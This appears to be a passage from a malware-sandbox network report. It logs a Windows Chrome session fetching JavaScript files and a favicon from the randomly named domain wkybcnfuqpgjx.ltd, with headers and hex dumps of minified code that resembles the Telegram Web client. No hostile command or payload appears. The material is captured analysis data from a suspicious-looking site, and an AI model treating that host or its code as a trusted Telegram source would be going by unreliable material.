22 69 6e 76 61 6c 69 64 20 77 65 69 67 68 74 20 22 2e 63 6f 6e 63 61 74 28 74
                                  Data Ascii: unction(){return this._value<=0},t.prototype.getValue=function(){return this._value},t.prototype.setValue=function(t){this._value=t,this._dispatchQueue()},t.prototype.release=function(t){if(void 0===t&&(t=1),t<=0)throw new Error("invalid weight ".concat(t
                                  2025-01-12 00:03:47 UTC1369INData Raw: 7c 74 68 69 73 2e 5f 71 75 65 75 65 5b 30 5d 2e 70 72 69 6f 72 69 74 79 3c 65 29 26 26 74 3c 3d 74 68 69 73 2e 5f 76 61 6c 75 65 7d 2c 74 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 72 2d 2d 29 69 66 28 65 28 74 5b 72 5d 29 29 72 65 74 75 72 6e 20 72 3b 72 65 74 75 72 6e 2d 31 7d 65 2e 64 65 66 61 75 6c 74 3d 69 7d 2c 34 35 38 36 3a 28 74 2c 65 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 65 2e 45 5f 43 41 4e 43 45 4c 45 44 3d 65 2e 45 5f 41 4c 52 45 41 44 59 5f 4c 4f 43 4b 45 44 3d 65 2e 45 5f 54 49 4d 45 4f 55
                                  Data Ascii: |this._queue[0].priority<e)&&t<=this._value},t}();function u(t,e){for(var r=t.length-1;r>=0;r--)if(e(t[r]))return r;return-1}e.default=i},4586:(t,e)=>{"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.E_CANCELED=e.E_ALREADY_LOCKED=e.E_TIMEOU
                                  2025-01-12 00:03:47 UTC1369INData Raw: 69 28 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 74 2e 67 65 74 56 61 6c 75 65 7d 65 2e 77 69 74 68 54 69 6d 65 6f 75 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 75 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6f 2e 45 5f 54 49 4d 45 4f 55 54 29 2c 7b 61 63 71 75 69 72 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 2c 73 29 7b 76 61 72 20 61 3b 69 66 28 69 28 74 29 3f 61 3d 6f 3a 28 61 3d 76 6f 69 64 20 30 2c 73 3d 6f 29 2c 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 3c 3d 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 77 65 69 67 68 74 20 22 2e 63 6f 6e 63 61 74 28 61 2c 22 3a 20 6d 75 73 74 20 62 65 20 70 6f 73 69 74 69 76 65 22 29 29 3b 72 65 74 75 72 6e 20 6e
                                  Data Ascii: i(t){return void 0!==t.getValue}e.withTimeout=function(t,e,r){var u=this;return void 0===r&&(r=o.E_TIMEOUT),{acquire:function(o,s){var a;if(i(t)?a=o:(a=void 0,s=o),void 0!==a&&a<=0)throw new Error("invalid weight ".concat(a,": must be positive"));return n
                                  2025-01-12 00:03:47 UTC1369INData Raw: 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 76 61 72 20 61 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 28 72 29 7d 29 2c 65 29 3b 28 69 28 74 29 3f 74 2e 77 61 69 74 46 6f 72 55 6e 6c 6f 63 6b 28 75 2c 6f 29 3a 74 2e 77 61 69 74 46 6f 72 55 6e 6c 6f 63 6b 28 6f 29 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 61 29 2c 6e 28 29 7d 29 29 7d 29 29 7d 2c 69 73 4c 6f 63 6b 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 69 73 4c 6f 63 6b 65 64 28 29 7d 2c 67 65 74 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 67 65 74 56 61 6c 75 65 28 29 7d 2c 73 65 74 56 61 6c 75 65 3a 66 75 6e
                                  Data Ascii: Promise((function(n,s){var a=setTimeout((function(){return s(r)}),e);(i(t)?t.waitForUnlock(u,o):t.waitForUnlock(o)).then((function(){clearTimeout(a),n()}))}))},isLocked:function(){return t.isLocked()},getValue:function(){return t.getValue()},setValue:fun


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.649834172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC551OUTGET /2976.4e6e9b1254ce313f06c5.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: same-origin
                                  Sec-Fetch-Dest: worker
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:48 UTC922INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:48 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-3878"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7nCPp65Bqbrp26Xhs4yMGpYNEz%2BEHoWicJU1OooKSXWi4oqLbEob3uCKjgqIAm6a1Q97dhxb84%2B%2Bqj1BkUo1gjauo6BM4MtCagDCiZ3cTNmrY9jtEQhDdrTrTXV%2FpbHwoWAqWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ae6ccaefa5-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2448&min_rtt=2448&rtt_var=1224&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4224&recv_bytes=1129&delivery_rate=188011&cwnd=208&unsent_bytes=0&cid=d2e21831c559ada5&ts=645&x=0"
                                  2025-01-12 00:03:48 UTC447INData Raw: 33 38 37 38 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 2c 72 3d 7b 32 39 37 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 76 61 72 20 61 3d 72 28 37 37 38 34 29 3b 63 6f 6e 73 74 20 6f 3d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 34 35 30 29 2c 6e 65 77 20 53 65 74 28 5b 22 6e 65 77 4d 65 73 73 61 67 65 22 2c 22 6e 65 77 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 22 2c 22 64 65 6c 65 74 65 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 53 63 68 65 64 75 6c 65 64 4d 65 73 73 61 67 65 73 22 2c 22 64 65 6c 65 74 65 48 69 73 74 6f 72 79 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 69 6d 61
                                  Data Ascii: 3878(()=>{"use strict";var e,t,r={2976:(e,t,r)=>{var a=r(7784);const o=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set(["ima
                                  2025-01-12 00:03:48 UTC1369INData Raw: 77 20 53 65 74 28 5b 22 61 75 64 69 6f 2f 6d 70 33 22 2c 22 61 75 64 69 6f 2f 6f 67 67 22 2c 22 61 75 64 69 6f 2f 77 61 76 22 2c 22 61 75 64 69 6f 2f 6d 70 65 67 22 2c 22 61 75 64 69 6f 2f 66 6c 61 63 22 2c 22 61 75 64 69 6f 2f 61 61 63 22 2c 22 61 75 64 69 6f 2f 6d 34 61 22 2c 22 61 75 64 69 6f 2f 6d 70 34 22 2c 22 61 75 64 69 6f 2f 78 2d 6d 34 61 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 2e 2e 2e 6f 2c 2e 2e 2e 69 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 55 53 45 52 4e 41 4d 45 5f 50 55 52 43 48 41 53 45 5f 41 56 41 49 4c 41 42 4c 45 22 2c 22 55 53 45 52 4e 41 4d 45 5f 49 4e 56 41 4c 49 44 22 5d 29 2c 6e 65 77 20 53 65 74 28 5b 22 74 2e 6d 65 22 2c 22 77 65 62 2e 74 2e 6d 65 22 2c 22 61 2e 74 2e 6d 65 22 2c 22 6b 2e 74 2e 6d 65 22 2c 22 7a 2e 74 2e 6d 65 22
                                  Data Ascii: w Set(["audio/mp3","audio/ogg","audio/wav","audio/mpeg","audio/flac","audio/aac","audio/m4a","audio/mp4","audio/x-m4a"]),new Set([...o,...i]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"
                                  2025-01-12 00:03:48 UTC1369INData Raw: 61 74 61 3f 2e 63 68 61 6e 6e 65 6c 3d 3d 3d 74 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 61 29 7b 61 7c 7c 28 61 3d 65 3d 3e 7b 72 28 7b 74 79 70 65 3a 22 75 70 64 61 74 65 22 2c 75 70 64 61 74 65 3a 65 7d 29 7d 29 2c 74 2e 70 61 79 6c 6f 61 64 73 2e 66 6f 72 45 61 63 68 28 28 61 73 79 6e 63 20 74 3d 3e 7b 73 77 69 74 63 68 28 74 2e 74 79 70 65 29 7b 63 61 73 65 22 69 6e 69 74 22 3a 7b 63 6f 6e 73 74 7b 61 72 67 73 3a 72 7d 3d 74 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 61 77 61 69 74 20 65 28 22 69 6e 69 74 22 2c 61 2c 2e 2e 2e 72 29 3a 61 77 61 69 74 28 65 2e 69 6e 69 74 3f 2e 28 61 2c 2e 2e 2e 72 29 29 3b 62 72 65 61 6b 7d 63 61 73 65 22 63 61 6c 6c 4d 65 74 68 6f 64 22 3a 7b 63 6f 6e 73 74 7b 6d 65 73 73 61 67 65 49
                                  Data Ascii: ata?.channel===t&&function(e,t,r,a){a||(a=e=>{r({type:"update",update:e})}),t.payloads.forEach((async t=>{switch(t.type){case"init":{const{args:r}=t;"function"==typeof e?await e("init",a,...r):await(e.init?.(a,...r));break}case"callMethod":{const{messageI
                                  2025-01-12 00:03:48 UTC1369INData Raw: 22 2c 5b 22 6e 75 6d 62 65 72 22 2c 22 6e 75 6d 62 65 72 22 5d 29 2c 6c 6f 61 64 46 72 6f 6d 44 61 74 61 3a 4d 6f 64 75 6c 65 2e 63 77 72 61 70 28 22 6c 6f 74 74 69 65 5f 6c 6f 61 64 5f 66 72 6f 6d 5f 64 61 74 61 22 2c 22 6e 75 6d 62 65 72 22 2c 5b 22 6e 75 6d 62 65 72 22 2c 22 6e 75 6d 62 65 72 22 5d 29 7d 2c 65 28 29 7d 7d 29 29 2c 68 3d 6e 65 77 20 4d 61 70 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 66 65 74 63 68 28 65 29 2c 72 3d 74 2e 68 65 61 64 65 72 73 2e 67 65 74 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 3b 69 66 28 72 3f 2e 73 74 61 72 74 73 57 69 74 68 28 22 74 65 78 74 2f 22 29 29 72 65 74 75 72 6e 20 74 2e 74 65 78 74 28 29 3b 63 6f 6e 73 74 20 6f 3d 61 77 61 69 74 20 74 2e
                                  Data Ascii: ",["number","number"]),loadFromData:Module.cwrap("lottie_load_from_data","number",["number","number"])},e()}})),h=new Map;async function m(e){const t=await fetch(e),r=t.headers.get("Content-Type");if(r?.startsWith("text/"))return t.text();const o=await t.
                                  2025-01-12 00:03:48 UTC1369INData Raw: 61 74 61 2e 73 65 74 28 64 29 3b 72 28 74 2c 61 77 61 69 74 20 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 28 6e 29 29 7d 2c 22 72 6c 6f 74 74 69 65 3a 64 65 73 74 72 6f 79 22 3a 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 6c 65 74 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 74 72 79 7b 63 6f 6e 73 74 20 65 3d 68 2e 67 65 74 28 74 29 3b 75 2e 64 65 73 74 72 6f 79 28 65 2e 68 61 6e 64 6c 65 29 2c 68 2e 64 65 6c 65 74 65 28 74 29 7d 63 61 74 63 68 28 61 29 7b 72 7c 7c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 65 28 74 2c 21 30 29 29 2c 31 65 33 29 7d 7d 7d 2c 22 6d 65 64 69 61 22 29 3b 76 61 72 20 67 3d 72 28 35 39
                                  Data Ascii: ata.set(d);r(t,await createImageBitmap(n))},"rlottie:destroy":function e(t){let r=arguments.length>1&&void 0!==arguments[1]&&arguments[1];try{const e=h.get(t);u.destroy(e.handle),h.delete(t)}catch(a){r||setTimeout((()=>e(t,!0)),1e3)}}},"media");var g=r(59
                                  2025-01-12 00:03:48 UTC1369INData Raw: 65 73 3d 73 2c 74 68 69 73 2e 69 73 50 6f 6c 79 66 69 6c 6c 3d 6e 2c 74 68 69 73 2e 6f 6e 43 6f 6e 66 69 67 3d 72 2c 74 68 69 73 2e 6f 6e 43 68 75 6e 6b 3d 61 2c 74 68 69 73 2e 66 69 6c 65 3d 67 2e 63 72 65 61 74 65 46 69 6c 65 28 29 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 45 72 72 6f 72 3d 65 3d 3e 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 52 65 61 64 79 3d 74 68 69 73 2e 6f 6e 52 65 61 64 79 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 66 69 6c 65 2e 6f 6e 53 61 6d 70 6c 65 73 3d 74 68 69 73 2e 6f 6e 53 61 6d 70 6c 65 73 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 6c 6f 61 64 4d 65 74 61 64 61 74 61 28 29 7d 61 73 79 6e 63 20 6c 6f 61 64 4d 65 74 61 64 61 74 61 28 29 7b 6c 65 74 20 65 3d 30
                                  Data Ascii: es=s,this.isPolyfill=n,this.onConfig=r,this.onChunk=a,this.file=g.createFile(),this.file.onError=e=>{console.error(e)},this.file.onReady=this.onReady.bind(this),this.file.onSamples=this.onSamples.bind(this),this.loadMetadata()}async loadMetadata(){let e=0
                                  2025-01-12 00:03:48 UTC1369INData Raw: 72 69 70 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 66 69 6c 65 2e 67 65 74 54 72 61 63 6b 42 79 49 64 28 65 2e 69 64 29 3b 66 6f 72 28 63 6f 6e 73 74 20 65 20 6f 66 20 74 2e 6d 64 69 61 2e 6d 69 6e 66 2e 73 74 62 6c 2e 73 74 73 64 2e 65 6e 74 72 69 65 73 29 69 66 28 65 2e 61 76 63 43 7c 7c 65 2e 68 76 63 43 7c 7c 65 2e 61 76 31 43 29 7b 63 6f 6e 73 74 20 74 3d 6e 65 77 20 67 2e 44 61 74 61 53 74 72 65 61 6d 28 76 6f 69 64 20 30 2c 30 2c 67 2e 44 61 74 61 53 74 72 65 61 6d 2e 42 49 47 5f 45 4e 44 49 41 4e 29 3b 72 65 74 75 72 6e 20 65 2e 61 76 63 43 3f 65 2e 61 76 63 43 2e 77 72 69 74 65 28 74 29 3a 65 2e 68 76 63 43 3f 65 2e 68 76 63 43 2e 77 72 69 74 65 28 74 29 3a 65 2e 61 76 31 43 26 26 65 2e 61 76 31 43 2e 77 72 69 74 65 28 74 29
                                  Data Ascii: ription(e){const t=this.file.getTrackById(e.id);for(const e of t.mdia.minf.stbl.stsd.entries)if(e.avcC||e.hvcC||e.av1C){const t=new g.DataStream(void 0,0,g.DataStream.BIG_ENDIAN);return e.avcC?e.avcC.write(t):e.hvcC?e.hvcC.write(t):e.av1C&&e.av1C.write(t)
                                  2025-01-12 00:03:48 UTC1369INData Raw: 6c 65 2e 6c 6f 67 28 22 5b 56 69 64 65 6f 20 50 72 65 76 69 65 77 5d 20 57 65 62 43 6f 64 65 63 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 22 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 65 3d 3e 7b 6b 3d 65 7d 29 29 3b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 53 65 74 3b 72 65 74 75 72 6e 20 53 3d 6e 65 77 20 56 69 64 65 6f 44 65 63 6f 64 65 72 28 7b 61 73 79 6e 63 20 6f 75 74 70 75 74 28 65 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 74 69 6d 65 73 74 61 6d 70 2f 31 65 36 2c 72 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 29 3b 69 66 28 21 6e 2e 68 61 73 28 72 29 29 7b 63 6f 6e 73 74 20 74 3d 61 77 61 69 74 20 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 28 65 29 3b 6e 2e 61 64 64 28 72 29 2c 6f 28 72 2c 74 29 7d 65 2e 63 6c 6f 73 65 28 29 7d 2c 65 72 72 6f 72 28
                                  Data Ascii: le.log("[Video Preview] WebCodecs not supported"),new Promise((e=>{k=e}));const n=new Set;return S=new VideoDecoder({async output(e){const t=e.timestamp/1e6,r=Math.floor(t);if(!n.has(r)){const t=await createImageBitmap(e);n.add(r),o(r,t)}e.close()},error(
                                  2025-01-12 00:03:48 UTC1369INData Raw: 31 37 39 2c 31 37 38 2c 31 37 36 2c 31 37 35 2c 31 37 33 2c 31 37 31 2c 38 35 2c 32 31 2c 31 36 37 2c 31 36 35 2c 34 31 2c 31 36 33 2c 31 36 31 2c 35 2c 37 39 2c 31 35 37 2c 37 38 2c 31 35 34 2c 31 35 33 2c 31 39 2c 37 35 2c 31 34 39 2c 37 34 2c 31 34 37 2c 37 33 2c 31 34 34 2c 31 34 33 2c 37 31 2c 31 34 31 2c 31 34 30 2c 31 33 39 2c 31 33 37 2c 31 37 2c 31 33 35 2c 31 33 34 2c 31 33 33 2c 36 36 2c 31 33 31 2c 36 35 2c 31 32 39 2c 31 5d 2c 49 3d 5b 30 2c 39 2c 31 30 2c 31 30 2c 31 34 2c 31 32 2c 31 34 2c 31 34 2c 31 36 2c 31 35 2c 31 36 2c 31 35 2c 31 36 2c 31 35 2c 31 35 2c 31 37 2c 31 38 2c 31 37 2c 31 32 2c 31 38 2c 31 36 2c 31 37 2c 31 37 2c 31 39 2c 31 39 2c 31 38 2c 31 39 2c 31 38 2c 31 38 2c 31 39 2c 31 39 2c 31 39 2c 32 30 2c 31 39 2c 32 30 2c 32
                                  Data Ascii: 179,178,176,175,173,171,85,21,167,165,41,163,161,5,79,157,78,154,153,19,75,149,74,147,73,144,143,71,141,140,139,137,17,135,134,133,66,131,65,129,1],I=[0,9,10,10,14,12,14,14,16,15,16,15,16,15,15,17,18,17,12,18,16,17,17,19,19,18,19,18,18,19,19,19,20,19,20,2
                                  2025-01-12 00:03:48 UTC1369INData Raw: 67 68 74 3a 69 7d 3d 65 2c 6e 3d 65 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 2c 73 3d 22 66 69 6c 74 65 72 22 69 6e 20 6e 3b 73 26 26 28 6e 2e 66 69 6c 74 65 72 3d 60 62 6c 75 72 28 24 7b 72 7d 70 78 29 60 29 2c 6e 2e 64 72 61 77 49 6d 61 67 65 28 61 2c 32 2a 2d 72 2c 32 2a 2d 72 2c 6f 2b 34 2a 72 2c 69 2b 34 2a 72 29 2c 73 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 61 2c 6f 2c 69 2c 6e 29 7b 69 66 28 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 69 29 7c 7c 69 3c 31 29 72 65 74 75 72 6e 3b 69 7c 3d 30 2c 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 6e 29 26 26 28 6e 3d 31 29 2c 28 6e 7c 3d 30 29 3e 33 26 26 28 6e 3d 33 29 2c 6e 3c 31 26 26 28 6e 3d 31 29 3b 63 6f 6e 73 74 20 73 3d 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 61 2c 6f 29
                                  Data Ascii: ght:i}=e,n=e.getContext("2d"),s="filter"in n;s&&(n.filter=`blur(${r}px)`),n.drawImage(a,2*-r,2*-r,o+4*r,i+4*r),s||function(e,t,r,a,o,i,n){if(Number.isNaN(i)||i<1)return;i|=0,Number.isNaN(n)&&(n=1),(n|=0)>3&&(n=3),n<1&&(n=1);const s=e.getImageData(0,0,a,o)


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.649833172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC590OUTGET /favicon.ico HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:48 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:48 GMT
                                  Content-Type: image/x-icon
                                  Content-Length: 2409
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-969"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqcjUF%2BwtL087GntT2ewD35IJSGtINgmBXtXCDnyWOMJNEajOXf7GbX2Vg6hb9AE2EvRfyPgBxkRYOp6IQiy94f3kEUji13jAun4JPmtl%2FZ9XDQDjhNjaolmyBc6SDKnLAe8AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2ae6caf8c23-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2870&min_rtt=2870&rtt_var=1435&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4224&recv_bytes=1168&delivery_rate=198436&cwnd=227&unsent_bytes=0&cid=3945138865815ad4&ts=665&x=0"
                                  2025-01-12 00:03:48 UTC471INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 31 03 00 00 36 00 00 00 30 30 00 00 01 00 20 00 64 04 00 00 67 03 00 00 10 10 00 00 01 00 20 00 9e 01 00 00 cb 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 f8 49 44 41 54 78 01 bd 94 27 78 e3 40 10 85 17 1a 1a 06 9a 9d d2 95 2e 18 78 30 d0 30 30 f0 60 60 a0 61 a0 d2 95 de 9a a0 a1 a1 a0 d2 5b d3 f5 bd be 70 d9 dc 9b f4 e8 f3 ca dd ef fb 7e 5b 65 67 de cc ee d8 a2 5c 39 79 95 76 fc df 59 67 ef b7 eb ec fd 0a 80 04 fa 11 f9 f8 0c ef b0 c6 97 69 51 2f 21 99 05 3c a0 87 76 7f 52 39 38 3b 3f f5 63 8c 55 bd f1 46 94 72 36 e4 a4 b3 23 35 a0 a1 9d 1f 15 c3 b1 28 22 37 ec 45 a9 8a bb 46 70 38 08 e3 7a 80 7c 81 ed cb 96 b2 cc b1 d0 86 b9 1c dc fe 4e f5
                                  Data Ascii: 1600 dg PNGIHDR szzIDATx'x@.x000``a[p~[eg\9yvYgiQ/!<vR98;?cUFr6#5("7EFp8z|N
                                  2025-01-12 00:03:48 UTC1369INData Raw: 61 52 6e f6 46 01 b7 1a d0 6b 30 54 e8 48 12 27 30 49 e2 1d 1f 85 ed c5 cc 63 c5 21 5f 12 5a 74 e3 03 d0 2b 12 8d 59 3c 78 5c 24 9b 8f b3 b9 69 5d a8 38 9f 99 65 14 60 af 5c cb ee e5 1b 7a cd fd b6 17 99 6e fe 6d 67 f3 6c 0c 00 ef 52 92 50 1c e7 33 c2 de a2 63 e9 3a e8 5a ba a6 62 b0 c9 c8 e3 f9 8e be 32 66 72 18 ba 52 ca 22 16 79 cc 78 d7 81 c0 85 db b5 74 45 95 c0 89 cb 11 a6 3c 31 4f c7 ca b5 2b 6c ef 3c db b9 78 49 95 80 18 e2 01 4b 52 a4 74 39 79 b2 c2 da 38 4f e3 42 f1 83 4a e1 a3 31 cd 2b 0a 2c 65 ae d8 5b b0 70 e3 75 78 17 54 0d c3 d8 66 bf c8 6e e0 4f 2b 31 0e 9e ae 78 92 e5 9d 5b 1d de b9 ee 58 38 a7 6a 19 c3 90 4a a5 5f 0f a0 79 3d bc 50 40 46 40 af 8b c8 b5 2f 9c 51 2d 20 29 ff f4 f8 68 12 d7 b1 97 88 2b e3 45 29 bc 08 da e6 4f a9 91 b0 47 66
                                  Data Ascii: aRnFk0TH'0Ic!_Zt+Y<x\$i]8e`\znmglRP3c:Zb2frR"yxtE<1O+l<xIKRt9y8OBJ1+,e[puxTfnO+1x[X8jJ_y=P@F@/Q- )h+E)OGf
                                  2025-01-12 00:03:48 UTC569INData Raw: b1 bd af f2 71 76 32 2c 98 03 ab bc a0 75 9c 84 1e df fb 8a 06 09 c4 b4 18 1b eb 24 c6 c6 8e a4 1c df fb 92 06 81 b1 2d 29 b1 99 88 5e 0b 3b 6e a1 32 0c ea 60 f7 cb 9e 02 e3 ca 31 da f8 a7 48 f4 47 90 44 ea 71 90 60 6c 4f 6a 06 07 fe a2 7b c0 d7 11 fb c4 09 3b 28 c1 65 8a 83 b6 18 49 69 e2 5b 32 61 34 e1 4b 0c 53 46 b6 a4 c7 55 6c 98 ce c4 fc 9c 8e ee 7c ae 19 b9 81 c6 67 e6 bb 00 ba b0 e9 45 ec 7f 00 d9 0a 0b 64 b1 00 47 34 00 00 00 00 49 45 4e 44 ae 42 60 82 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 01 65 49 44 41 54 78 01 95 92 25 74 ac 31 10 85 23 d7 7b f1 64 1e e7 61 eb 55 e5 7a 2f 56 56 56 56 56 46 96 99 59 ae fc 65 65 ca 29 a7 9c 72 64 dd f4 ce 62 96 68 ce f9 82 77 6e 50 54 47 f7 a6 57
                                  Data Ascii: qv2,u$-)^;n2`1HGDq`lOj{;(eIi[2a4KSFUl|gEdG4IENDB`PNGIHDRaeIDATx%t1#{daUz/VVVVVFYee)rdbhwnPTGW


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.649835172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:47 UTC369OUTGET /8673.1b6dd8d303b0535cc1f8.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
